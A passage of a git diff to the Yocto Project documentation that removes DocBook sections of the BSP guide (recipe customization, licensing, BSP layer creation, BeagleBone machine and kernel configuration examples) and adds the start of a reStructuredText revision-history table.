-                    <emphasis>Use a Yocto Linux Kernel:</emphasis>
-                    Kernel recipes in the BSP should be based on a
-                    Yocto Linux kernel.
-                    Basing your recipes on these kernels reduces
-                    the costs for maintaining the BSP and increases
-                    its scalability.
-                    See the <filename>Yocto Linux Kernel</filename>
-                    category in the
-                    <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink>
-                    for these kernels.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='customizing-a-recipe-for-a-bsp'>
-    <title>Customizing a Recipe for a BSP</title>
-
-    <para>
-        If you plan on customizing a recipe for a particular BSP,
-        you need to do the following:
-        <itemizedlist>
-            <listitem><para>
-                Create a <filename>*.bbappend</filename> file for
-                the modified recipe.
-                For information on using append files, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#using-bbappend-files'>Using .bbappend Files in Your Layer</ulink>"
-                section in the Yocto Project Development Tasks
-                Manual.
-                </para></listitem>
-            <listitem><para>
-                Ensure your directory structure in the BSP layer
-                that supports your machine is such that the
-                OpenEmbedded build system can find it.
-                See the example later in this section for more
-                information.
-                </para></listitem>
-            <listitem><para>
-                Put the append file in a directory whose name matches
-                the machine's name and is located in an appropriate
-                sub-directory inside the BSP layer (i.e.
-                <filename>recipes-bsp</filename>,
-                <filename>recipes-graphics</filename>,
-                <filename>recipes-core</filename>, and so forth).
-                </para></listitem>
-            <listitem><para>
-                Place the BSP-specific files in the proper
-                directory inside the BSP layer.
-                How expansive the layer is affects where you must
-                place these files.
-                For example, if your layer supports several
-                different machine types, you need to be sure your
-                layer's directory structure includes hierarchy
-                that separates the files according to machine.
-                If your layer does not support multiple machines,
-                the layer would not have that additional hierarchy
-                and the files would obviously not be able to reside
-                in a machine-specific directory.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        Following is a specific example to help you better understand
-        the process.
-        This example customizes customizes a recipe by adding a
-        BSP-specific configuration file named
-        <filename>interfaces</filename> to the
-        <filename>init-ifupdown_1.0.bb</filename> recipe for machine
-        "xyz" where the BSP layer also supports several other
-        machines:
-        <orderedlist>
-            <listitem><para>
-                Edit the
-                <filename>init-ifupdown_1.0.bbappend</filename> file
-                so that it contains the following:
-                <literallayout class='monospaced'>
-     FILESEXTRAPATHS_prepend := "${THISDIR}/files:"
-                </literallayout>
-                The append file needs to be in the
-                <filename>meta-xyz/recipes-core/init-ifupdown</filename>
-                directory.
-                </para></listitem>
-            <listitem><para>
-                Create and place the new
-                <filename>interfaces</filename> configuration file in
-                the BSP's layer here:
-                <literallayout class='monospaced'>
-     meta-xyz/recipes-core/init-ifupdown/files/xyz-machine-one/interfaces
-                </literallayout>
-                <note>
-                    If the <filename>meta-xyz</filename> layer did
-                    not support multiple machines, you would place
-                    the <filename>interfaces</filename> configuration
-                    file in the layer here:
-                    <literallayout class='monospaced'>
-     meta-xyz/recipes-core/init-ifupdown/files/interfaces
-                    </literallayout>
-                </note>
-                The
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESEXTRAPATHS'><filename>FILESEXTRAPATHS</filename></ulink>
-                variable in the append files extends the search path
-                the build system uses to find files during the build.
-                Consequently, for this example you need to have the
-                <filename>files</filename> directory in the same
-                location as your append file.
-                </para></listitem>
-       </orderedlist>
-    </para>
-</section>
-
-<section id='bsp-licensing-considerations'>
-    <title>BSP Licensing Considerations</title>
-
-    <para>
-        In some cases, a BSP contains separately-licensed
-        Intellectual Property (IP) for a component or components.
-        For these cases, you are required to accept the terms
-        of a commercial or other type of license that requires
-        some kind of explicit End User License Agreement (EULA).
-        Once you accept the license, the OpenEmbedded build system
-        can then build and include the corresponding component
-        in the final BSP image.
-        If the BSP is available as a pre-built image, you can
-        download the image after agreeing to the license or EULA.
-    </para>
-
-    <para>
-        You could find that some separately-licensed components
-        that are essential for normal operation of the system might
-        not have an unencumbered (or free) substitute.
-        Without these essential components, the system would be
-        non-functional.
-        Then again, you might find that other licensed components
-        that are simply 'good-to-have' or purely elective do have
-        an unencumbered, free replacement component that you can
-        use rather than agreeing to the separately-licensed
-        component.
-        Even for components essential to the system, you might
-        find an unencumbered component that is not identical but
-        will work as a less-capable version of the licensed version
-        in the BSP recipe.
-    </para>
-
-    <para>
-        For cases where you can substitute a free component and
-        still maintain the system's functionality, the "DOWNLOADS"
-        selection from the "SOFTWARE" tab on the
-        <ulink url='&YOCTO_HOME_URL;'>Yocto Project website</ulink>
-        makes available de-featured BSPs that are completely free
-        of any IP encumbrances.
-        For these cases, you can use the substitution directly and
-        without any further licensing requirements.
-        If present, these fully de-featured BSPs are named
-        appropriately different as compared to the names of their
-        respective encumbered BSPs.
-        If available, these substitutions are your simplest and
-        most preferred options.
-        Obviously, use of these substitutions assumes the resulting
-        functionality meets system requirements.
-        <note>
-            If however, a non-encumbered version is unavailable or
-            it provides unsuitable functionality or quality, you can
-            use an encumbered version.
-        </note>
-    </para>
-
-    <para>
-        A couple different methods exist within the OpenEmbedded
-        build system to satisfy the licensing requirements for an
-        encumbered BSP.
-        The following list describes them in order of preference:
-        <orderedlist>
-            <listitem><para>
-                <emphasis>Use the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE_FLAGS'><filename>LICENSE_FLAGS</filename></ulink>
-                Variable to Define the Recipes that Have Commercial
-                or Other Types of Specially-Licensed Packages:</emphasis>
-                For each of those recipes, you can specify a
-                matching license string in a
-                <filename>local.conf</filename> variable named
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE_FLAGS_WHITELIST'><filename>LICENSE_FLAGS_WHITELIST</filename></ulink>.
-                Specifying the matching license string signifies
-                that you agree to the license.
-                Thus, the build system can build the corresponding
-                recipe and include the component in the image.
-                See the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-commercially-licensed-recipes'>Enabling Commercially Licensed Recipes</ulink>"
-                section in the Yocto Project Development Tasks
-                Manual for details on how to use these variables.
-                </para>
-
-                <para>If you build as you normally would, without
-	        specifying any recipes in the
-	        <filename>LICENSE_FLAGS_WHITELIST</filename>, the
-                build stops and provides you with the list of recipes
-                that you have tried to include in the image that
-                need entries in the
-                <filename>LICENSE_FLAGS_WHITELIST</filename>.
-                Once you enter the appropriate license flags into
-                the whitelist, restart the build to continue where
-                it left off.
-	        During the build, the prompt will not appear again
-	        since you have satisfied the requirement.</para>
-
-                <para>Once the appropriate license flags are on the
-                white list in the
-                <filename>LICENSE_FLAGS_WHITELIST</filename> variable,
-                you can build the encumbered image with no change
-                at all to the normal build process.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Get a Pre-Built Version of the BSP:</emphasis>
-                You can get this type of BSP by selecting the
-                "DOWNLOADS" item from the "SOFTWARE" tab on the
-                <ulink url='&YOCTO_HOME_URL;'>Yocto Project website</ulink>.
-                You can download BSP tarballs that contain
-                proprietary components after agreeing to the
-                licensing requirements of each of the individually
-                encumbered packages as part of the download process.
-                Obtaining the BSP this way allows you to access an
-                encumbered image immediately after agreeing to the
-                click-through license agreements presented by the
-                website.
-                If you want to build the image yourself using
-                the recipes contained within the BSP tarball,
-                you will still need to create an appropriate
-                <filename>LICENSE_FLAGS_WHITELIST</filename>
-                to match the encumbered recipes in the BSP.
-                </para></listitem>
-        </orderedlist>
-        <note>
-            Pre-compiled images are bundled with a time-limited
-            kernel that runs for a predetermined amount of time
-            (10 days) before it forces the system to reboot.
-            This limitation is meant to discourage direct
-            redistribution of the image.
-            You must eventually rebuild the image if you want
-            to remove this restriction.
-        </note>
-    </para>
-</section>
-
-<section id='creating-a-new-bsp-layer-using-the-bitbake-layers-script'>
-    <title>Creating a new BSP Layer Using the <filename>bitbake-layers</filename> Script</title>
-
-    <para>
-        The <filename>bitbake-layers create-layer</filename> script
-        automates creating a BSP layer.
-        What makes a layer a "BSP layer" is the presence of at least one machine
-        configuration file.
-        Additionally, a BSP layer usually has a kernel recipe
-        or an append file that leverages off an existing kernel recipe.
-        The primary requirement, however, is the machine configuration.
-    </para>
-
-    <para>
-        Use these steps to create a BSP layer:
-        <itemizedlist>
-            <listitem><para>
-                <emphasis>Create a General Layer:</emphasis>
-                Use the <filename>bitbake-layers</filename> script with the
-                <filename>create-layer</filename> subcommand to create a
-                new general layer.
-                For instructions on how to create a general layer using the
-                <filename>bitbake-layers</filename> script, see the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</ulink>"
-                section in the Yocto Project Development Tasks Manual.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Create a Layer Configuration File:</emphasis>
-                Every layer needs a layer configuration file.
-                This configuration file establishes locations for the
-                layer's recipes, priorities for the layer, and so forth.
-                You can find examples of <filename>layer.conf</filename>
-                files in the Yocto Project
-                <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink>.
-                To get examples of what you need in your configuration
-                file, locate a layer (e.g. "meta-ti") and examine the
-                <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/meta-ti/tree/conf/layer.conf'></ulink>
-                file.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Create a Machine Configuration File:</emphasis>
-                Create a <filename>conf/machine/</filename><replaceable>bsp_root_name</replaceable><filename>.conf</filename>
-                file.
-                See
-                <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-yocto-bsp/conf/machine'><filename>meta-yocto-bsp/conf/machine</filename></ulink>
-                for sample
-                <replaceable>bsp_root_name</replaceable><filename>.conf</filename>
-                files.
-                Other samples such as
-                <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/meta-ti/tree/conf/machine'><filename>meta-ti</filename></ulink>
-                and
-                <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/meta-freescale/tree/conf/machine'><filename>meta-freescale</filename></ulink>
-                exist from other vendors that have more specific machine
-                and tuning examples.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Create a Kernel Recipe:</emphasis>
-                Create a kernel recipe in <filename>recipes-kernel/linux</filename>
-                by either using a kernel append file or a new custom kernel
-                recipe file (e.g. <filename>yocto-linux_4.12.bb</filename>).
-                The BSP layers mentioned in the previous step also contain different
-                kernel examples.
-                See the
-                "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#modifying-an-existing-recipe'>Modifying an Existing Recipe</ulink>"
-                section in the Yocto Project Linux Kernel Development Manual
-                for information on how to create a custom kernel.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        The remainder of this section provides a description of
-        the Yocto Project reference BSP for Beaglebone, which
-        resides in the
-        <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-yocto-bsp'><filename>meta-yocto-bsp</filename></ulink>
-        layer.
-    </para>
-
-    <section id='bsp-layer-configuration-example'>
-        <title>BSP Layer Configuration Example</title>
-
-        <para>
-            The layer's <filename>conf</filename> directory
-            contains the <filename>layer.conf</filename>
-            configuration file.
-            In this example, the
-            <filename>conf/layer.conf</filename> is the
-            following:
-            <literallayout class='monospaced'>
-     # We have a conf and classes directory, add to BBPATH
-     BBPATH .= ":${LAYERDIR}"
-
-     # We have recipes-* directories, add to BBFILES
-     BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
-                 ${LAYERDIR}/recipes-*/*/*.bbappend"
-
-     BBFILE_COLLECTIONS += "yoctobsp"
-     BBFILE_PATTERN_yoctobsp = "^${LAYERDIR}/"
-     BBFILE_PRIORITY_yoctobsp = "5"
-     LAYERVERSION_yoctobsp = "4"
-     LAYERSERIES_COMPAT_yoctobsp = "&DISTRO_NAME_NO_CAP;"
-            </literallayout>
-            The variables used in this file configure the
-            layer.
-            A good way to learn about layer configuration
-            files is to examine various files for BSP from
-            the
-            <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink>.
-        </para>
-
-        <para>
-            For a detailed description of this particular
-            layer configuration file, see
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-layer-config-file-description'>step 3</ulink>
-            in the discussion that describes how to create
-            layers in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='bsp-machine-configuration-example'>
-        <title>BSP Machine Configuration Example</title>
-
-        <para>
-            As mentioned earlier in this section, the existence
-            of a machine configuration file is what makes a
-            layer a BSP layer as compared to a general or
-            kernel layer.
-        </para>
-
-        <para>
-            One or more machine configuration files exist in the
-            <replaceable>bsp_layer</replaceable><filename>/conf/machine/</filename>
-            directory of the layer:
-            <literallayout class='monospaced'>
-     <replaceable>bsp_layer</replaceable><filename>/conf/machine/</filename><replaceable>machine1</replaceable><filename>.conf</filename>
-     <replaceable>bsp_layer</replaceable><filename>/conf/machine/</filename><replaceable>machine2</replaceable><filename>.conf</filename>
-     <replaceable>bsp_layer</replaceable><filename>/conf/machine/</filename><replaceable>machine3</replaceable><filename>.conf</filename>
-     ... more ...
-            </literallayout>
-            For example, the machine configuration file for the
-            <ulink url='http://beagleboard.org/bone'>BeagleBone and BeagleBone Black development boards</ulink>
-            is located in the layer
-            <filename>poky/meta-yocto-bsp/conf/machine</filename>
-            and is named <filename>beaglebone-yocto.conf</filename>:
-            <literallayout class='monospaced'>
-     #@TYPE: Machine
-     #@NAME: Beaglebone-yocto machine
-     #@DESCRIPTION: Reference machine configuration for http://beagleboard.org/bone and http://beagleboard.org/black boards
-
-     PREFERRED_PROVIDER_virtual/xserver ?= "xserver-xorg"
-     XSERVER ?= "xserver-xorg \
-                xf86-video-modesetting \
-                "
-
-     MACHINE_EXTRA_RRECOMMENDS = "kernel-modules kernel-devicetree"
-
-     EXTRA_IMAGEDEPENDS += "u-boot"
-
-     DEFAULTTUNE ?= "cortexa8hf-neon"
-     include conf/machine/include/tune-cortexa8.inc
-
-     IMAGE_FSTYPES += "tar.bz2 jffs2 wic wic.bmap"
-     EXTRA_IMAGECMD_jffs2 = "-lnp "
-     WKS_FILE ?= "beaglebone-yocto.wks"
-     IMAGE_INSTALL_append = " kernel-devicetree kernel-image-zimage"
-     do_image_wic[depends] += "mtools-native:do_populate_sysroot dosfstools-native:do_populate_sysroot"
-
-     SERIAL_CONSOLES ?= "115200;ttyS0 115200;ttyO0"
-     SERIAL_CONSOLES_CHECK = "${SERIAL_CONSOLES}"
-
-     PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
-     PREFERRED_VERSION_linux-yocto ?= "5.0%"
-
-     KERNEL_IMAGETYPE = "zImage"
-     KERNEL_DEVICETREE = "am335x-bone.dtb am335x-boneblack.dtb am335x-bonegreen.dtb"
-     KERNEL_EXTRA_ARGS += "LOADADDR=${UBOOT_ENTRYPOINT}"
-
-     SPL_BINARY = "MLO"
-     UBOOT_SUFFIX = "img"
-     UBOOT_MACHINE = "am335x_evm_defconfig"
-     UBOOT_ENTRYPOINT = "0x80008000"
-     UBOOT_LOADADDRESS = "0x80008000"
-
-     MACHINE_FEATURES = "usbgadget usbhost vfat alsa"
-
-     IMAGE_BOOT_FILES ?= "u-boot.${UBOOT_SUFFIX} MLO zImage am335x-bone.dtb am335x-boneblack.dtb am335x-bonegreen.dtb"
-            </literallayout>
-            The variables used to configure the machine define
-            machine-specific properties;
-            for example, machine-dependent packages, machine
-            tunings, the type of kernel to build, and
-            U-Boot configurations.
-        </para>
-
-        <para>
-            The following list provides some explanation
-            for the statements found in the example reference
-            machine configuration file for the BeagleBone
-            development boards.
-            Realize that much more can be defined as part of
-            a machine's configuration file.
-            In general, you can learn about related variables
-            that this example does not have by locating the
-            variables in the
-            "<ulink url='&YOCTO_DOCS_REF_URL;#ref-variables-glos'>Yocto Project Variables Glossary</ulink>"
-            in the Yocto Project Reference Manual.
-            <itemizedlist>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER_virtual/xserver</filename></ulink>:
-                    The recipe that provides "virtual/xserver" when
-                    more than one provider is found.
-                    In this case, the recipe that provides
-                    "virtual/xserver" is "xserver-xorg", which
-                    exists in
-                    <filename>poky/meta/recipes-graphics/xorg-xserver</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-XSERVER'><filename>XSERVER</filename></ulink>:
-                    The packages that should be installed to provide
-                    an X server and drivers for the machine.
-                    In this example, the "xserver-xorg" and
-                    "xf86-video-modesetting" are installed.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_EXTRA_RRECOMMENDS'><filename>MACHINE_EXTRA_RRECOMMENDS</filename></ulink>:
-                    A list of machine-dependent packages
-                    not essential for booting the image.
-                    Thus, the build does not fail if the packages
-                    do not exist.
-                    However, the packages are required for a
-                    fully-featured image.
-                    <note><title>Tip</title>
-                        Many <filename>MACHINE*</filename> variables
-                        exist that help you configure a particular
-                        piece of hardware.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGEDEPENDS'><filename>EXTRA_IMAGEDEPENDS</filename></ulink>:
-                    Recipes to build that do not provide packages
-                    for installing into the root filesystem
-                    but building the image depends on the
-                    recipes.
-                    Sometimes a recipe is required to build
-                    the final image but is not needed in the
-                    root filesystem.
-                    In this case, the U-Boot recipe must be
-                    built for the image.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-DEFAULTTUNE'><filename>DEFAULTTUNE</filename></ulink>:
-                    Machines use tunings to optimize machine,
-                    CPU, and application performance.
-                    These features, which are collectively known
-                    as "tuning features", exist in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#oe-core'>OpenEmbedded-Core (OE-Core)</ulink>
-                    layer (e.g.
-                    <filename>poky/meta/conf/machine/include</filename>).
-                    In this example, the default tunning file is
-                    "cortexa8hf-neon".
-                    <note>
-                        The <filename>include</filename> statement
-                        that pulls in the
-                        <filename>conf/machine/include/tune-cortexa8.inc</filename>
-                        file provides many tuning possibilities.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></ulink>:
-                    The formats the OpenEmbedded build system
-                    uses during the build when creating the
-                    root filesystem.
-                    In this example, four types of images are
-                    supported.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGECMD'><filename>EXTRA_IMAGECMD</filename></ulink>:
-                    Specifies additional options for image
-                    creation commands.
-                    In this example, the "-lnp " option is used
-                    when creating the
-                    <ulink url='https://en.wikipedia.org/wiki/JFFS2'>JFFS2</ulink>
-                    image.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-WKS_FILE'><filename>WKS_FILE</filename></ulink>:
-                    The location of the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-kickstart'>Wic kickstart</ulink>
-                    file used by the OpenEmbedded build system to
-                    create a partitioned image (image.wic).
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>:
-                    Specifies packages to install into an image
-                    through the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-image'><filename>image</filename></ulink>
-                    class.
-                    Recipes use the <filename>IMAGE_INSTALL</filename>
-                    variable.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>do_image_wic[depends]</filename>:
-                    A task that is constructed during the build.
-                    In this example, the task depends on specific tools
-                    in order to create the sysroot when buiding a Wic
-                    image.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SERIAL_CONSOLES'><filename>SERIAL_CONSOLES</filename></ulink>:
-                    Defines a serial console (TTY) to enable using
-                    getty.
-                    In this case, the baud rate is "115200" and the
-                    device name is "ttyO0".
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER_virtual/kernel</filename></ulink>:
-                    Specifies the recipe that provides
-                    "virtual/kernel" when more than one provider
-                    is found.
-                    In this case, the recipe that provides
-                    "virtual/kernel" is "linux-yocto", which
-                    exists in the layer's
-                    <filename>recipes-kernel/linux</filename> directory.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_VERSION'><filename>PREFERRED_VERSION_linux-yocto</filename></ulink>:
-                    Defines the version of the recipe used
-                    to build the kernel, which is "5.0" in this
-                    case.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_IMAGETYPE'><filename>KERNEL_IMAGETYPE</filename></ulink>:
-                    The type of kernel to build for the device.
-                    In this case, the OpenEmbedded build system
-                    creates a "zImage" image type.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_DEVICETREE'><filename>KERNEL_DEVICETREE</filename></ulink>:
-                    The names of the generated Linux kernel device
-                    trees (i.e. the <filename>*.dtb</filename>) files.
-                    All the device trees for the various BeagleBone
-                    devices are included.
-<!--
-                    You have to include some *.inc files according to the definition of KERNEL_DEVICETREE.
-                    I don't see where these are being provided.
--->
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-KERNEL_EXTRA_ARGS'><filename>KERNEL_EXTRA_ARGS</filename></ulink>:
-                    Additional <filename>make</filename>
-                    command-line arguments the OpenEmbedded build
-                    system passes on when compiling the kernel.
-                    In this example, "LOADADDR=${UBOOT_ENTRYPOINT}"
-                    is passed as a command-line argument.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SPL_BINARY'><filename>SPL_BINARY</filename></ulink>:
-                    Defines the Secondary Program Loader (SPL) binary
-                    type.
-                    In this case, the SPL binary is set to
-                    "MLO", which stands for Multimedia card LOader.
-                    </para>
-
-                    <para>The BeagleBone development board requires an
-                    SPL to boot and that SPL file type must be MLO.
-                    Consequently, the machine configuration needs to
-                    define <filename>SPL_BINARY</filename> as "MLO".
-                    <note>
-                        For more information on how the SPL variables
-                        are used, see the
-                        <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/recipes-bsp/u-boot/u-boot.inc'><filename>u-boot.inc</filename></ulink>
-                        include file.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-UBOOT_ENTRYPOINT'><filename>UBOOT_*</filename></ulink>:
-                    Defines various U-Boot configurations needed
-                    to build a U-Boot image.
-                    In this example, a U-Boot image is required
-                    to boot the BeagleBone device.
-                    See the following variables for more information:
-                    <itemizedlist>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-UBOOT_SUFFIX'><filename>UBOOT_SUFFIX</filename></ulink>:
-                            Points to the generated U-Boot extension.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-UBOOT_MACHINE'><filename>UBOOT_MACHINE</filename></ulink>:
-                            Specifies the value passed on the make command line when building a U-Boot image.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-UBOOT_ENTRYPOINT'><filename>UBOOT_ENTRYPOINT</filename></ulink>:
-                            Specifies the entry point for the U-Boot image.
-                            </para></listitem>
-                        <listitem><para>
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-UBOOT_LOADADDRESS'><filename>UBOOT_LOADADDRESS</filename></ulink>:
-                            Specifies the load address for the U-Boot image.
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></ulink>:
-                    Specifies the list of hardware features the
-                    BeagleBone device is capable of supporting.
-                    In this case, the device supports
-                    "usbgadget usbhost vfat alsa".
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_BOOT_FILES'><filename>IMAGE_BOOT_FILES</filename></ulink>:
-                    Files installed into the device's boot partition
-                    when preparing the image using the Wic tool
-                    with the <filename>bootimg-partition</filename>
-                    source plugin.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='bsp-kernel-recipe-example'>
-        <title>BSP Kernel Recipe Example</title>
-
-        <para>
-            The kernel recipe used to build the kernel image
-            for the BeagleBone device was established in the
-            machine configuration:
-            <literallayout class='monospaced'>
-     PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
-     PREFERRED_VERSION_linux-yocto ?= "5.0%"
-            </literallayout>
-            The <filename>meta-yocto-bsp/recipes-kernel/linux</filename>
-            directory in the layer contains metadata used
-            to build the kernel.
-            In this case, a kernel append file (i.e.
-            <filename>linux-yocto_5.0.bbappend</filename>) is used to
-            override an established kernel recipe (i.e.
-            <filename>linux-yocto_5.0.bb</filename>), which is
-            located in
-            <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/recipes-kernel/linux'></ulink>.
-        </para>
-
-        <para>
-            Following is the contents of the append file:
-            <literallayout class='monospaced'>
-     KBRANCH_genericx86  = "v5.0/standard/base"
-     KBRANCH_genericx86-64  = "v5.0/standard/base"
-     KBRANCH_edgerouter = "v5.0/standard/edgerouter"
-     KBRANCH_beaglebone-yocto = "v5.0/standard/beaglebone"
-
-     KMACHINE_genericx86 ?= "common-pc"
-     KMACHINE_genericx86-64 ?= "common-pc-64"
-     KMACHINE_beaglebone-yocto ?= "beaglebone"
-
-     SRCREV_machine_genericx86    ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
-     SRCREV_machine_genericx86-64 ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
-     SRCREV_machine_edgerouter ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
-     SRCREV_machine_beaglebone-yocto ?= "3df4aae6074e94e794e27fe7f17451d9353cdf3d"
-
-     COMPATIBLE_MACHINE_genericx86 = "genericx86"
-     COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64"
-     COMPATIBLE_MACHINE_edgerouter = "edgerouter"
-     COMPATIBLE_MACHINE_beaglebone-yocto = "beaglebone-yocto"
-
-     LINUX_VERSION_genericx86 = "5.0.3"
-     LINUX_VERSION_genericx86-64 = "5.0.3"
-     LINUX_VERSION_edgerouter = "5.0.3"
-     LINUX_VERSION_beaglebone-yocto = "5.0.3"
-            </literallayout>
-            This particular append file works for all the
-            machines that are part of the
-            <filename>meta-yocto-bsp</filename> layer.
-            The relevant statements are appended with
-            the "beaglebone-yocto" string.
-            The OpenEmbedded build system uses these
-            statements to override similar statements
-            in the kernel recipe:
-            <itemizedlist>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-KBRANCH'><filename>KBRANCH</filename></ulink>:
-                    Identifies the kernel branch that is validated,
-                    patched, and configured during the build.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-KMACHINE'><filename>KMACHINE</filename></ulink>:
-                    Identifies the machine name as known by the
-                    kernel, which is sometimes a different name
-                    than what is known by the OpenEmbedded build
-                    system.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCREV'><filename>SRCREV</filename></ulink>:
-                    Identifies the revision of the source code used
-                    to build the image.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-COMPATIBLE_MACHINE'><filename>COMPATIBLE_MACHINE</filename></ulink>:
-                    A regular expression that resolves to one or
-                    more target machines with which the recipe
-                    is compatible.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-LINUX_VERSION'><filename>LINUX_VERSION</filename></ulink>:
-                    The Linux version from kernel.org used by
-                    the OpenEmbedded build system to build the
-                    kernel image.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-</chapter>
diff --git a/documentation/bsp-guide/history.rst b/documentation/bsp-guide/history.rst
new file mode 100644
index 0000000000..a67750f6ea
--- /dev/null
+++ b/documentation/bsp-guide/history.rst
@@ -0,0 +1,85 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***********************
+Manual Revision History
+***********************
+
+.. list-table::
+   :widths: 10 15 40
+   :header-rows: 1
+
+   * - Revision
+     - Date
+     - Note
+   * - 0.9
+     - November 2010
+     - The initial document released with the Yocto Project 0.9 Release
+   * - 1.0
+     - April 2011
+     - Released with the Yocto Project 1.0 Release.
+   * - 1.1
+     - October 2011
+     - Released with the Yocto Project 1.1 Release.
+   * - 1.2
+     - April 2012
+     - Released with the Yocto Project 1.2 Release.
+   * - 1.3
+     - October 2012
+     - Released with the Yocto Project 1.3 Release.
+   * - 1.4
+     - April 2013
+     - Released with the Yocto Project 1.4 Release.
+   * - 1.5
+     - October 2013
+     - Released with the Yocto Project 1.5 Release.
+   * - 1.6
+     - April 2014
+     - Released with the Yocto Project 1.6 Release.
+   * - 1.7
+     - October 2014
+     - Released with the Yocto Project 1.7 Release.
+   * - 1.8
+     - April 2015
+     - Released with the Yocto Project 1.8 Release.
+   * - 2.0
+     - October 2015
+     - Released with the Yocto Project 2.0 Release.
+   * - 2.1
+     - April 2016
+     - Released with the Yocto Project 2.1 Release.
+   * - 2.2
+     - October 2016
+     - Released with the Yocto Project 2.2 Release.
+   * - 2.3
+     - May 2017
+     - Released with the Yocto Project 2.3 Release.
+   * - 2.4
